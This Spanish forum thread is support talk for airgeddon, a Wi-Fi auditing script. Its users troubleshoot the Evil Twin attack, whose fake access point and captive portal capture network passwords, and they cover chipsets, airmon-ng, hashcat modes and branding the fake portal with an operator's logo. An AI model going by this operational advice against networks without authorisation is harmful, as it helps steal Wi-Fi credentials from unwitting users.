entro a tal menu , eligo tal ..y luego hago esto otro ...  ;)
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 27-05-2021, 08:06 (Jueves)
además ayudaría saber que tarjeta tienes, que versión de airgeddon es, y un pantallazo del error o algo.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: elmenda en 30-05-2021, 02:59 (Domingo)

He probado con la ultima version current y te explico los pasos que doy.

Tengo una tarjeta con chip RT3070 que me ha funcionado perfectamente en otras versiones de airgeddon, en esta tambien captura el handshake con facilidad tras elegir la opcion 9 dentro del menu del gemelo malvado.

El problema viene cuando una vez capturado el handshake y tras elegir por defecto las opciones que aparecen a la hora de levantar el servidor y las otras opciones me encuentro con esto:

(https://i.ibb.co/J3MQhzk/DEFINITIVA.png) (https://ibb.co/VwPmKvB)

En el DHCP me aparece Not configured to listen on any interfaces! y en la pantalla superior could not read interface wlan3 y interface wlan3 wasn't started te pido disculpas por el tamaño un tanto chapucero porque se me da muy mal esto de la captura y los pantallazos.

Añado que nunca he tenido problemas con este programa salvo el famoso IP TABLES pero que con la configuracion que viene por defecto ya no falla.

Un saludo.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 31-05-2021, 08:34 (Lunes)
Hola, pero lo de "la última versión current" es muy confuso para mi. Necesito saber la versión exacta. Es decir, si es la v10.41, o la v10.42 o cual estás usando. No es tan difícil, se ve al arranar airgeddon o también en el menú de créditos. Ten en cuenta que en github hay una, en cada distro puede haber otra. Yo no se exactamente cual es la que estás usando. De todas formas, parece que tienes algún problema con network manager. Así que es muy probable que estés usando la v10.41. Si descargas la v10.42 del github de la rama de desarrollo "dev" en teoría ya no debería pasarte. (git clone -b dev https://github.com/v1s1t0r1sh3r3/airgeddon) y si no, mata network manager antes de lanzar airgeddon. Ese parece tu problema.

Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 31-05-2021, 12:59 (Lunes)
Hola, pero lo de "la última versión current" es muy confuso para mi. Necesito saber la versión exacta. Es decir, si es la v10.41, o la v10.42 o cual estás usando. No es tan difícil, se ve al arranar airgeddon o también en el menú de créditos. Ten en cuenta que en github hay una, en cada distro puede haber otra. Yo no se exactamente cual es la que estás usando. De todas formas, parece que tienes algún problema con network manager. Así que es muy probable que estés usando la v10.41. Si descargas la v10.42 del github de la rama de desarrollo "dev" en teoría ya no debería pasarte. (git clone -b dev https://github.com/v1s1t0r1sh3r3/airgeddon) y si no, mata network manager antes de lanzar airgeddon. Ese parece tu problema.

creo que se refiere a la iso de wifislax de desarrollo (-current) ,hace unos dias se corrigio un problema en httpd en el fichero de config , pero creo que airgeddon usa sus propios config , asi que no se si esta relacionado.
intentare subir pronto otra iso current , con ese paquete corregido , y mirare tambien añadir la version que dice v1sit0r por si acaso.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 31-05-2021, 17:13 (Lunes)
bueno, la v10.42 aún está en desarrollo. Aunque ya tiene un par de cosillas hechas y es funcional, pero seguramente llevará algo más cuando salga.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: elmenda en 31-05-2021, 17:38 (Lunes)
bueno, la v10.42 aún está en desarrollo. Aunque ya tiene un par de cosillas hechas y es funcional, pero seguramente llevará algo más cuando salga.

Como dice UsuarioNuevo es la version que incluye la ultima current que ha subido que nose cual es exactamente.

Añado que has creado el programa mas chulo y potente de los ultimos años en cuanto a seguridad de redes. Lo he probado infinidad de veces con amigos y nada que ver con Linset y similares. Este funciona a la maravilla y la perfeccion, te lo digo para que no pienses que soy el clasico tocaguevos que solo entra para quejarse, nada mas lejos de la realidad.

Ojala estos fallos puedan ser solucionados y seguir disfrutando de Airgeddon y Wifislax, felicidades a ti tambien UsuarioNuevo porque menudo curro te pegas y que hay agradecertelo de corazon.

Edito: He parado NetworkManager y Airgeddon ha funcionado sin problemas, muchas gracias Visitor!!!
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 03-08-2021, 10:29 (Martes)
Nueva release de airgeddon v10.42!!! no hay cambios estructurales en ficheros ni cambios en las dependencias esta vez.

El changelog:

10.42
Changed airmon compatibility check to fit same method used by airmon
VIF support check added before launching Evil Twin attacks
airgeddon version shown in title at main menu
Fixed arabic scrambled strings and added missing arabic strings to missing dependencies plugin
Fixed debug mode malfunction
Added busy ports checkings on Evil Twin attacks
Dockerfile rollback to Arch (ArchStrike image as base) due to Parrot repos problems

Saludos.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 03-08-2021, 11:56 (Martes)
Gracias por el aviso , y a seguir  ;)
Título: Re:Script multiuso en bash, airgeddon
Publicado por: pepe10000 en 04-08-2021, 10:26 (Miércoles)
Nueva release de airgeddon v10.42!!! no hay cambios estructurales en ficheros ni cambios en las dependencias esta vez.

El changelog:

10.42
Changed airmon compatibility check to fit same method used by airmon
VIF support check added before launching Evil Twin attacks
airgeddon version shown in title at main menu
Fixed arabic scrambled strings and added missing arabic strings to missing dependencies plugin
Fixed debug mode malfunction
Added busy ports checkings on Evil Twin attacks
Dockerfile rollback to Arch (ArchStrike image as base) due to Parrot repos problems

Saludos.

Hola.

Estoy probando la nueva versión y veo que has hecho un buen trabajo.

Peloteos aparte, solo comentar un par de cosas.

1.- Ya no necesito forzar las IP-Tables, sin hacerlo ya no me aparece el error dichoso en la pantalla principal, genial.

2.- En una ocasión, al cerrar el Evil Twin con portal cautivo con la tecla "Enter", me ha salido un mensaje de que no se había detectado la tarjeta y me ha mandado al menú se selección de tarjeta.

Supongo que es la nueva función "Added busy ports checkings on Evil Twin attacks", pero solo me ha salido una vez, ¿es normal?.

Continuo con las pruebas y si sale algo más digno de mención avisaré.

Gracias y un saludo.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 04-08-2021, 10:54 (Miércoles)
No, eso parece más un error puntual... a saber... lo de los checks de los puertos es para que no pase como a alguno le pasaba... q levantaba un apache por su cuenta, ocupaba el puerto 80 por ejemplo, y luego iba a lanzar el evil twin y el servidor web (lighttpd) del evil twin petaba porque el puerto ya estaba en uso. Ahora airgeddon antes de lanzar los ataques, chequea que los puertos que necesita están libres y si no lo están te salta un error en rojo y te indica el problema con el puerto y tal... así que ese no es tu error porque son mensajes muy explícitos cuando eso pasa.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: martim en 04-08-2021, 11:41 (Miércoles)
Pena que no pueda usar este programa, ya que no entiendo nada de linux, hay algo similar para windwos?
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 04-08-2021, 12:23 (Miércoles)
La verdad es que no. No hay nada similar. airgeddon integra muchísimas funcionalidades. Puedes encontrar algún programa que haga una sola cosa, pero me temo que programas que hagan tantas cosas diferentes sobre wifi no encontrarás para Windows... y me atrevería a decir que tampoco para Linux.

Saludos.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: cesar981 en 06-08-2021, 16:21 (Viernes)
Hola v1s1t0r, ¡Saludos desde Brasil! Enhorabuena por el desarrollo del script airgeddon, muy completo y funcional, me gustaría si es posible personalizar en la raíz del script principal un logo (imagen) en el sector donde se genera el portal capitive ¿es posible?
Lo he probado varias veces pero sin éxito, tal vez sea algo simple pero no sé, creo que me puedes explicar cómo hacerlo, sigue el guión

#Create captive portal files. Cgi bash scripts, css and js file
function set_captive_portal_page() {

   debug_print

   {
   echo -e "body * {"
   echo -e "\tbox-sizing: border-box;"
   echo -e "\tfont-family: Helvetica, Arial, sans-serif;"
   echo -e "}\n"
   echo -e ".button {"
   echo -e "\tcolor: #FFFFFF;"
   echo -e "\tbackground-color: #2B6B85;"
   echo -e "\tborder-radius: 5px;"
   echo -e "\tcursor: pointer;"
   echo -e "\theight: 30px;"
   echo -e "}\n"
   echo -e ".content {"
   echo -e "\twidth: 100%;"
   echo -e "\tbackground-color: #398DB0;"
   echo -e "\tpadding: 20px;"
   echo -e "\tmargin: 15px auto 0;"
   echo -e "\tborder-radius: 15px;"
   echo -e "\tcolor: #FFFFFF;"
   echo -e "}\n"
   echo -e ".title {"
   echo -e "\ttext-align: center;"
   echo -e "\tmargin-bottom: 15px;"
   echo -e "}\n"
   echo -e "#password {"
   echo -e "\twidth: 100%;"
   echo -e "\tmargin-bottom: 5px;"
   echo -e "\tborder-radius: 5px;"
   echo -e "\theight: 30px;"
   echo -e "}\n"
   echo -e "#password:hover,"
   echo -e "#password:focus {"
   echo -e "\tbox-shadow: 0 0 10px #6DE6FF;"
   echo -e "}\n"
   echo -e ".bold {"
   echo -e "\tfont-weight: bold;"
   echo -e "}\n"
   echo -e "#showpass {"
   echo -e "\tvertical-align: top;"
   echo -e "}\n"
   echo -e "@media screen (min-width: 1000px) {"
   echo -e "\t.content {"
   echo -e "\t\twidth: 50%;"
   echo -e "\t}"
   echo -e "}\n"
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 06-08-2021, 17:40 (Viernes)
Hola, claro que se puede personalizar el portal cautivo. airgeddon pone uno genérico, pero luego cada uno puede personalizarlo como quiera. Lee esto del wiki de airgeddon (está en inglés, sorry):

https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/FAQ%20&%20Troubleshooting#can-be-the-evil-twin-captive-portal-page-be-customized-how

Incluso ha habido gente ya que ha hecho plugins para esto:

https://github.com/KeyofBlueS/airgeddon-plugins

Saluddos.

Título: Re:Script multiuso en bash, airgeddon
Publicado por: cesar981 en 06-08-2021, 21:36 (Viernes)
Gracias por responder, ya intenté crear un portal personalizado, pero no puedo usar el sistema de complementos si tuviera un video explicativo, sería más fácil. Lo que realmente quería era insertar un logotipo personalizado (imagen png) en el portal cautivo predeterminado de airgeddon, ¿pueden guiarme? ¡¡Muchas gracias por adelantado!!
Título: Re:Script multiuso en bash, airgeddon
Publicado por: dynyly en 07-08-2021, 00:25 (Sábado)
salu2
ya es viejo quizas de algun fallo pero he probado por encima en pc aparece index y desvia si no inserta clave ... algo olvidado que tenia por ahi
si usa nueva version de airgedon ; añada a carpeta de plugins segun su direccion que tenga new version de airgedon
puede usar los que le ofrecen en los enlaces anteriores solo es meterlos en carpeta fijese en video ...

https://mega.nz/file/2U4WRKzA#6HONjBzWjXABo6gG_pU8CDNGhZ2FWGdVOvYfbKlWLVg

ejemplo de uso ...
Título: Re:Script multiuso en bash, airgeddon
Publicado por: cesar981 en 07-08-2021, 20:07 (Sábado)
Estimado amigo dynyly, Gracias por ayudar, pero no pude cambiar el plugin disponible para descargar, ya que está en español, y también con errores, seguí todos los pasos del video, pero tiene muchos cortes.
Lo que realmente quería era insertar un logotipo (imagen) en la página falsa, con el logotipo del operador en el portal cautivo neutral de airgeddon.
Preciso alterar para Portugues do Brasil
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 07-08-2021, 20:22 (Sábado)
VA BIEN   ;D ;D ;D ;D ;D

(https://i.ibb.co/M8Vdjdw/Screenshot-20210807-202238.png)
Título: Re:Script multiuso en bash, airgeddon
Publicado por: blade21net en 17-08-2021, 19:15 (Martes)
Hola,

Me da este error, la tengo en modo monitor y si escanea redes pero al hacer el ataque con portal cautivo

El interfaz wlan0 que tienes seleccionado no soporta VIF (Virtual Interface).

¿Que puedo hacer?

Gracias
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 17-08-2021, 19:22 (Martes)
Lo que puedes hacer es comprar una tarjeta que soporte VIF. La tuya no lo soporta.

Si quieres saber que es VIF lee esto: https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/FAQ-&-Troubleshooting#my-fake-ap-is-not-working-on-any-evil-twin-attack-why

Si quieres una lista de tarjetas que funcionan bien y tienen todo lo necesario, aquí: https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Cards%20and%20Chipsets
Título: Re:Script multiuso en bash, airgeddon
Publicado por: Xiop Jartep en 17-08-2021, 21:02 (Martes)
Estoy probando Airgeddon 10.42, en Wifislax 3 version 16082021 y me da error para crear el ap falso:

(https://imagizer.imageshack.com/img922/598/40dJtx.png)     (https://imagizer.imageshack.com/img922/8801/xqHVO8.png)

Se que no es la version final pero seria bueno que se corrija. estoy usando antenas compatibles(Signal King y Ubdo nt8) de chipset 3070, en Wifislax 2.4 si me crea el ap falso y funciona bien.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: blade21net en 17-08-2021, 22:21 (Martes)

Muchas gracias por todo, lo he estado leyendo y me ha quedado claro. Gracias por tu magnifico script

Lo que puedes hacer es comprar una tarjeta que soporte VIF. La tuya no lo soporta.

Si quieres saber que es VIF lee esto: https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/FAQ-&-Troubleshooting#my-fake-ap-is-not-working-on-any-evil-twin-attack-why

Si quieres una lista de tarjetas que funcionan bien y tienen todo lo necesario, aquí: https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Cards%20and%20Chipsets
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 18-08-2021, 14:03 (Miércoles)
Hola @Xiop Jartep , no se a que te refieres con si no es la versión final. La v10.42 es la versión última de airgeddon. Efectivamente el chipset Ralink RT3070 no debería darte problemas, no obstante, parece como que hay problemas con tu network manager. Prueba a hacer un comando airmon-ng check kill antes de arrancar airgeddon a ver si te funciona.... también prueba si eso no te funciona a desconectar y conectar de nuevo la tarjeta wifi, que a veces se quedan un poco pilladas y dan justo ese error que te sale a tí. También tienes en el menú de opciones una opción nueva que interactúa con network manager... puedes probar a cambiarla. No se, por darte opciones... suerte!
Título: Re:Script multiuso en bash, airgeddon
Publicado por: Xiop Jartep en 18-08-2021, 22:34 (Miércoles)
Hola @v1s1t0r, voy a intentar lo que me recomiendas, pienso que la falla esta en el Wifislax 3 version 16082021 puesto que aun no es version final (a eso mereferia con version final), ya que en Wifislax 2.4 no tengo errores y me corre muy bien el ataque evil twin de Airgeddon.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 07-09-2021, 22:45 (Martes)
Buenas , en hashcat han dejado de usar -m 2500 , en favor del "todo en uno"  -m 22000

Te lo comento por que si el sistema tiene hashcat 6.2.4 o superior , se debera usar -m 22000 , si es una version inferior a 6.2.4 debera usar 2500

Vas a tener que hacer variables en los ataques de hashcat detectando que version hay en el sistema... o bien forzar en las dependencias hashcat 6.2.4 o superior.

Un saludo.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 08-09-2021, 00:42 (Miércoles)
He descubierto que puedes forzar , el uso de los plugins considerados obsoletos ..

Citar
--deprecated-check-disable

por lo que podrias seguir usando -m 2500  ,  añadiendo ese parametro.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 08-09-2021, 01:14 (Miércoles)
sorry , me equivoque de hilo.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 08-09-2021, 09:02 (Miércoles)
Gracias por el aviso. Fixed para la próxima versión v11.0 de airgeddon... ya controlará si la versión de hashcat es 6.2.4 o mayor y si es así, con el parámetro --deprecated-check-disable seguirá funcionando todo. Aquí está el commit: https://github.com/v1s1t0r1sh3r3/airgeddon/commit/c71d9ea2b1db78de3240c801e6d097b1ca8ce9d9
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 08-09-2021, 22:00 (Miércoles)
Gracias por el aviso. Fixed para la próxima versión v11.0 de airgeddon... ya controlará si la versión de hashcat es 6.2.4 o mayor y si es así, con el parámetro --deprecated-check-disable seguirá funcionando todo. Aquí está el commit: https://github.com/v1s1t0r1sh3r3/airgeddon/commit/c71d9ea2b1db78de3240c801e6d097b1ca8ce9d9

Yo no tardaria en sacar aunque sea como HOTFIX , archlinux tambien esta usando ya hashcat 6.2.4
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 08-09-2021, 22:07 (Miércoles)
Ufff, pues va a tardar... porque mañana me voy de viaje... vacaciones!! así que voy a estar algo desconectado. Y luego a la vuelta ya veremos. igual tarda un mes o así... pero bueno, a los que me lo vayan comentando, les voy redirigiendo a la rama "dev" de github donde está disponible en la v11.0, lo que pasa es que la version 11 tendrá más cosas... no solo eso y alguna chorrada que ya se ha hecho... lo digo por si estás pensando en usarla ya... mientras luego se pueda poner la 11 completa cuando sea que esté lista... ok.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 08-09-2021, 22:33 (Miércoles)
Ufff, pues va a tardar... porque mañana me voy de viaje... vacaciones!! así que voy a estar algo desconectado. Y luego a la vuelta ya veremos. igual tarda un mes o así... pero bueno, a los que me lo vayan comentando, les voy redirigiendo a la rama "dev" de github donde está disponible en la v11.0, lo que pasa es que la version 11 tendrá más cosas... no solo eso y alguna chorrada que ya se ha hecho... lo digo por si estás pensando en usarla ya... mientras luego se pueda poner la 11 completa cuando sea que esté lista... ok.

hombre , tendre que poner la dev , ... la estable actual , no funciona con hashcat 6.2.4 , asi que empaquetare la dev.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: elmenda en 06-01-2022, 14:04 (Jueves)
Ufff, pues va a tardar... porque mañana me voy de viaje... vacaciones!! así que voy a estar algo desconectado. Y luego a la vuelta ya veremos. igual tarda un mes o así... pero bueno, a los que me lo vayan comentando, les voy redirigiendo a la rama "dev" de github donde está disponible en la v11.0, lo que pasa es que la version 11 tendrá más cosas... no solo eso y alguna chorrada que ya se ha hecho... lo digo por si estás pensando en usarla ya... mientras luego se pueda poner la 11 completa cuando sea que esté lista... ok.

v1s1t0r vengo del post sobre la ultima current de UsuarioNuevo comentandole que Airgeddon sigue fallandonos a algunos usuarios dentro de las mismas, en su dia te hice varias capturas de pantalla pero el error no ha sido subsanado.

Temo que cuando UsuarioNuevo saque su iso final los creyentes de Airgeddon el que para muchos es el unico programa funcional y fiable en esto de auditar redes hoy en dia nos tengamos que conformar con seguir utilizando la version actual en la que funciona sin problemas.

Hay alguna novedad al respecto?

Muchas gracias por tu desinteresado trabajo y un saludo.

https://foro.seguridadwireless.net/colaboracion-y-desarrollo-de-nuestras-lives/script-multiuso-en-bash-airgeddon/640/
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 06-01-2022, 15:47 (Jueves)
Hola, no se muy bien a qué problemas te refieres. En la versión 11.0 que está aun en desarrollo hay algunos cambios, pero no hemos hecho release aún. Puede que alguno de los errores que comentas esté ya subsanado en esa versión. Creo que usuarionuevo ya empaquetó usando la rama dev con lo cual no debería haber problema. Saludos.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: elmenda en 10-01-2022, 16:35 (Lunes)
Hola, no se muy bien a qué problemas te refieres. En la versión 11.0 que está aun en desarrollo hay algunos cambios, pero no hemos hecho release aún. Puede que alguno de los errores que comentas esté ya subsanado en esa versión. Creo que usuarionuevo ya empaquetó usando la rama dev con lo cual no debería haber problema. Saludos.

Te he dejado el enlace con las mismas capturas de pantalla que hice en su dia porque repetirlo es absurdo. El caso es que la auditoria del gemelo malvado da problemas que no he visto subsanados en ninguna de las ultimas isos que UsuarioNuevo ha sacado.

Un saludo.

(https://i.ibb.co/ph9ym3X/DEFINITIVA.png)

Añado que cada version que sacas cuando la pongo a funcionar en la 2.4 vigente no da problema alguno asi que no creo que se trate de un problema relacionado con mi antena.

Chip Ralink 3070
Título: Re:Script multiuso en bash, airgeddon
Publicado por: MR. sergio en 10-01-2022, 17:18 (Lunes)
el poblema esta en  Ralink 3070
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 10-01-2022, 21:00 (Lunes)
Hola, ese problema seguramente sea o bien por la tarjeta (que no es la adecuada para hacer hacking wifi) o bien porque hay algún proceso en conflicto. La Ralink 3070 como comenta el otro compañero no debería dar problemas. Es un buen chipset y funciona sin problemas, yo tengo una y todo bien con ella. Las que más problemas dan son las de chipset Realtek RTL ya sea una RTL8812AU o RTLxxxx <- RTL lo que sea . Aquí teneis una lista de tarjetas que funcionan "out of the box" y que tienen chipsets compatibles, que soportan inyección, que soportan VIF (Virtual Interface) y demás: https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Cards%20and%20Chipsets

Si tu tarjeta es una de las "whitelisted" y aun así tienes problemas, te sugiero que pruebes a desconectarla y conectarla justo antes del ataque, seleccionándola de nuevo en el menú. Igual se quedó "frita", que a veces pasa también. También puedes probar a lanzar el comando fuera de airgeddon sudo airmon-ng check kill antes de lanzar airgeddon.

En serio, el Evil Twin no tiene bugs... le funciona bien a miles de personas. Si a tí no te funciona bien, hay que buscar la causa pero no es porque esté nada mal en el código. Más bien por el pantallazo parece lo que te indico, o bien tu tarjeta no es adecuada o bien hay procesos con conflictos. También te sugeriría que probases en otro pc, o con una imagen live de otro linux o cualquier otra cosa para ir descartando posibles cosas. Yo cuando algo no me funciona y no entiendo que pasa, hago muchas pruebas y voy eliminando elementos de forma lógica. Pruebo varias tarjetas, pruebo la misma tarjeta en otros Linux, etc... hasta dar con lo que ocurre.

También sugiero que os conecteis al canal de discord de airgeddon donde hay mucha actividad y mucha gente dando soporte. Es una gran comunidad, lo único que es en inglés: #######

P.D. adelanto que en la v11.0 de airgeddon hashcat tendrá soporte GPU

Saludos terrícolas!
Título: Re:Script multiuso en bash, airgeddon
Publicado por: elmenda en 11-01-2022, 16:37 (Martes)
Gracias compañero, hago la prueba con la proxima iso que saque UsuarioNuevo y te comento.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: Hwagm en 11-01-2022, 20:30 (Martes)
También sugiero que os conecteis al canal de discord de airgeddon donde hay mucha actividad y mucha gente dando soporte.

Soporte de que?

Porque no en un foro y sea público para todo el mundo?

Lo siento el foro no acepta el link
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 11-01-2022, 21:38 (Martes)
El canal de discord es público también. Cualquiera se abre una cuenta y entra, igual que en este foro. La diferencia básicamente es que aquí intento dar soporte yo, y en el canal de discord hay mucha gente que ayuda... es decir, se ha creado una comunidad en la que la gente se ayudan unos a otros sin que tenga que estar yo de por medio, lo cual me facilita la tarea para poder seguir desarrollando y no dedicar tanto tiempo a dar soporte. En cuanto al tipo de soporte, pues son las dudas típicas sobre qué tarjetas comprar, errores, gente que quiere personalizar el portal cautivo, otros que quiere desarrollar plugin usando el sistema de plugins que tiene airgeddon y muchos otros temas. Os recomiendo visitarlo. No obstante yo sigo por aquí intentando ayudar cuando puedo. Lo bueno que tiene este foro es que es en español, por si alguien no habla inglés pues le recomiendo que siga por aquí.

P.D. Como el foro no acepta el link, el que quiera verlo que vaya al github de airgeddon, wiki, contacto, y allí lo tiene.

Saludos.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: Hwagm en 12-01-2022, 20:54 (Miércoles)
La información del foro es visible sin necesidad de registro

P.D. Como el foro no acepta el link, el que quiera verlo que vaya al github de airgeddon, wiki, contacto, y allí lo tiene.

Pues dicho queda

Gracias por tu colaboración en el foro. Eso ante todo
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 12-01-2022, 22:33 (Miércoles)
He actualizado airgeddon en la iso de desarrollo , a la ultima version  -dev  ,  ya avisare cuando la suba para probar.

Un saludo.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: guillermo en 13-01-2022, 18:51 (Jueves)
Sin ninguna duda, las mejores luces de emergencia 16.

luz de emergencia v16 (https://www.pfseguridadvial.com/luz-de-emergencia-v16/)
luz emergencia coche (https://www.pfseguridadvial.com/luz-emergencia-coche/)
v16 (https://www.pfseguridadvial.com/v16/)
luz v16 (https://www.pfseguridadvial.com/luz-v16/)
Título: Re:Script multiuso en bash, airgeddon
Publicado por: elmenda en 14-01-2022, 12:49 (Viernes)
El canal de discord es público también. Cualquiera se abre una cuenta y entra, igual que en este foro. La diferencia básicamente es que aquí intento dar soporte yo, y en el canal de discord hay mucha gente que ayuda... es decir, se ha creado una comunidad en la que la gente se ayudan unos a otros sin que tenga que estar yo de por medio, lo cual me facilita la tarea para poder seguir desarrollando y no dedicar tanto tiempo a dar soporte. En cuanto al tipo de soporte, pues son las dudas típicas sobre qué tarjetas comprar, errores, gente que quiere personalizar el portal cautivo, otros que quiere desarrollar plugin usando el sistema de plugins que tiene airgeddon y muchos otros temas. Os recomiendo visitarlo. No obstante yo sigo por aquí intentando ayudar cuando puedo. Lo bueno que tiene este foro es que es en español, por si alguien no habla inglés pues le recomiendo que siga por aquí.

P.D. Como el foro no acepta el link, el que quiera verlo que vaya al github de airgeddon, wiki, contacto, y allí lo tiene.

Saludos.

He probado a realizar lo que me comentastes de desconectar y conectar mi tarjeta y las pantallas que te he mostrado siguen aparaciendo.

En cambio  si ejecuto la ultima version de Airgeddon en la ultima version oficial de Wifislax sigue yendo como la seda.

Gracias y un saludo.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 14-01-2022, 13:11 (Viernes)
No creo que tenga que ver con nada interno de airgeddon pues del código en esa parte no se ha cambiado nada... por los pantallazos, tu tarjeta no se puede poner en modo "master" para crear el AP porque algo no la deja... no se si es que se habrá incluído en wifislax algún servicio que pudiera ser conflictivo... pero me parecería raro. Imagino que probaste también lo de hacer el airmon-ng check kill justo antes de lanzar airgeddon (o no se si en wifislax era airmon-zc check kill, me suena que sí)...

Saludos!
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 14-01-2022, 22:23 (Viernes)
No creo que tenga que ver con nada interno de airgeddon pues del código en esa parte no se ha cambiado nada... por los pantallazos, tu tarjeta no se puede poner en modo "master" para crear el AP porque algo no la deja... no se si es que se habrá incluído en wifislax algún servicio que pudiera ser conflictivo... pero me parecería raro. Imagino que probaste también lo de hacer el airmon-ng check kill justo antes de lanzar airgeddon (o no se si en wifislax era airmon-zc check kill, me suena que sí)...

Saludos!

ya hace bastante tiempo que wifislax lleva airmon-ng 1.6 , como todas las distros, ya no hay ni zc ni old ni nada raro.

Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 01-02-2022, 00:12 (Martes)
Bueno, pues acaba de salir airgeddon v11.0

USUARIONUEVO , esta es la versión que ya puedes poner de master como la v11.0. Gracias!
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 01-02-2022, 02:49 (Martes)
Hecho.

El problemilla que te comento elmenda de que no podia levantar ap falso , eso esta resuelto.

Es una regla de udev , recordaba algo de hace tiempo , asi que arreglarlo fue rapido una vez identificado el problema.

Un saludo.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: Xiop Jartep en 01-02-2022, 03:26 (Martes)
Ya me ha logrado crear el ap falso Airgeddon,en esta versión de Wifislax_29012022 y 24012022, gracias por corregir ese error, todo parece funcionar bien pero en el celular no abre el portal cautivo, solo me conecta a la red falsa sin solicitar nada de contraseña.
 Utilizo la misma antena en Wifislax 2.4 y ahí si lanza el portal cautivo.

Dejo una foto de cuando no lanza el portal cautivo:

(https://i.postimg.cc/TYMMpg8f/error-en-airgeddon.png) (https://postimg.cc/4n5F0KNS)
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 01-02-2022, 08:40 (Martes)
Esa ventana del webserver (la amarilla) no pinta bien... ¿qué modelo de móvil es y que S.O. tiene? es curiosidad... y dices que en ese mismo ataque, otros dispositivos conectan y sí que salta el portal cautivo? y con el móvil no? si es así, parece más un problema del móvil que otra cosa.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: Xiop Jartep en 01-02-2022, 19:06 (Martes)
Esa ventana del webserver (la amarilla) no pinta bien... ¿qué modelo de móvil es y que S.O. tiene? es curiosidad... y dices que en ese mismo ataque, otros dispositivos conectan y sí que salta el portal cautivo? y con el móvil no? si es así, parece más un problema del móvil que otra cosa.


El celular donde no me salta el portal cautivo es un iphone y tiene IOS 14.6, con otros dispositivos no he probado si salta el portal cautivo. Pero en Wifislax 2.4 si me salta el portal cautivo sin ningun problema con este iphone.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 01-02-2022, 19:39 (Martes)
Una busqueda en google , apunta a que el fichero connections.c pertenece al paquete lighttpd ....que tiene logica tratandose se un problema con el portal cautivo , ahora bien ...no se que esta pasando hay , probablemente algun cambio en los argumentos de uso y de hay que se queje , pero no lo se seguro.

No tengo ahora mismo wifislax , pero he mirado los repos y creo queb tenemos

lighthttpd  1.4.51

luego he visto que salio tambien  lighthttpd2
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 01-02-2022, 21:24 (Martes)
Lo que puedo verificar es que he reproducido lo de los mensajes de error 400 en la ventana de lighttpd en otro S.O. (para ver que no tenía que ver con Wifislax). Esto fue en un Parrot, con lighttpd 1.4.59 , pero no obstante, a pesar de que los mensajes de "invalid request line", conectándo con mi móvil (Android 11) a la red falsa, el portal cautivo se abría sin problema y capturaba la clave y todo bien...

Así que creo que no parece importante el hecho de que salgan mensajes de warning. Será algo pasajero que corregirán en otra versión de lighttpd me imagino. Así que no se si es que en tu iphone por ser muy nuevo algo ha cambiado en el modo en que se detectan los portales cautivos... eso habría que investigarlo. Estoy suponiendo que iOS 14.6 es bastante nuevo (no estoy muy puesto en iphone la verdad).
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 01-02-2022, 22:00 (Martes)
si en la config se activa el debug se podra ver algo ?
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 01-02-2022, 22:12 (Martes)
el debug de q? de airgeddon? si te refieres al de airgeddon no... ya que eso es solo para ver las llamadas a las funciones e ir viendo por donde pasa el script.

Es que eso sin tener un iphone así de moderno me va a ser imposible de tratar... pero bueno, voy a preguntar por el grupo de discord a ver si a alguien más le pasa y a ver si alguien con iphone puede hacer algunas pruebas...

q version de airgeddon está usando la persona con el problema del iphone? entiendo que airgeddon v11.0, no?
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 01-02-2022, 22:22 (Martes)
